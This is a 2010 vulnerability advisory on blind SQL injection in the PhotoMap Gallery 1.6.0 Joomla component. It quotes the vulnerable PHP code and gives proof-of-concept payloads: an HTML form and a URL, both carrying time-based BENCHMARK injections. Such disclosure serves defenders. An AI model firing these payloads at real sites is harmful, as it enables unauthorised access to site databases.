Name              PhotoMap Gallery  

Vendor            http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658  

Versions Affected 1.6.0  

   

Author            Salvatore Fresta aka Drosophila  

Website           http://www.salvatorefresta.net  

Contact           salvatorefresta [at] gmail [dot] com  

Date              2010-07-28  

   

X. INDEX  

   

I.    ABOUT THE APPLICATION  

II.   DESCRIPTION  

III.  ANALYSIS  

IV.   SAMPLE CODE  

V.    FIX  

   

   

I. ABOUT THE APPLICATION  

________________________  

   

PhotoMap Gallery  is  a   gallery  component  completely  

integrated  into  Joomla 1.5.x. Like 'Picasa', 'Flickr',  

or 'Panoramio',  you  can  easily  add geo-tags  to your  

photos  so  that  you can remember exactly where they're  

from using Google Maps.  

   

   

II. DESCRIPTION  

_______________  

   

Some parameters  are not properly sanitised before being  

used in SQL queries.  

   

   

III. ANALYSIS  

_____________  

   

Summary:   

   

A) Multiple Blind SQL Injection  

_______________________________  

   

The parameter id passed to controller.php  via POST when  

view is set to user and task is set to save_usercategory  

is  not  properly sanitised  before being  used in a SQL  

query. This  can  be exploited to manipulate SQL queries  

by injecting arbitrary SQL code.  

   

The parameter folder passed to  imagehandler.php  is not  

properly sanitised before used in a SQL query.  This can  

be  exploited  to  manipulate  SQL  queries by injecting  

arbitrary SQL code.  

   

The following is the affected code.  

   

controller.php (line 1135):  

   

function save_usercategory() {  

   

    // Check for request forgeries  

    JRequest::checkToken() or jexit( 'Invalid Token' );  

           

    $user           = & JFactory::getUser();  

    $task           = JRequest::getVar('task');  

    $post           = JRequest::get('post');  

   

    //perform access checks  

    $isNew = ($post['id']) ? false : true;  

   

//  $catid = (int) JRequest::getVar('catid', 0);  

           

    $db     =& JFactory::getDBO();  

    $query = 'SELECT c.id, c.directory'  

                . ' FROM #__g_categories AS c'  

                . ' WHERE c.id = '.$post['id'];  

   

   

imagehandler.php (line 109);  

   

function getList() {  

   

    static $list;  

   

    // Only process the list once per request  

    if (is_array($list)) {  

        return $list;  

    }  

   

    // Get folder from request  

    $folder = $this->getState('folder');  

    $search = $this->getState('search');  

   

    $query = 'SELECT *'  

            . ' FROM #__g_categories'  

            . ' WHERE id = '.$folder;  

   

   

   

IV. SAMPLE CODE  

_______________  

   

A) Multiple Blind SQL Injection  

   

Replace 89eb36eca1919aff534b13b54796c9a4 with your own.  

   

<html>  

    <head>  

        <title>PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection</title>  

    </head>  

    <body>  

        <form method="POST" action="http://127.0.0.1/joomla/index.php">  

            <input type="hidden" name="89eb36eca1919aff534b13b54796c9a4" value="1">  

            <input type="hidden" name="option" value="com_photomapgallery">  

            <input type="hidden" name="controller" value="">  

            <input type="hidden" name="view" value="user">  

            <input type="hidden" name="task" value="save_usercategory">  

            <input type="hidden" name="id" value="-1 AND (SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))">  

            <input type="submit">  

        </form>  

    </body>  

</html>  

   

   

http://site/path/index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))  

   

   

V. FIX  

______  

   

No fix.

[课程]Android-CTF解题方法汇总！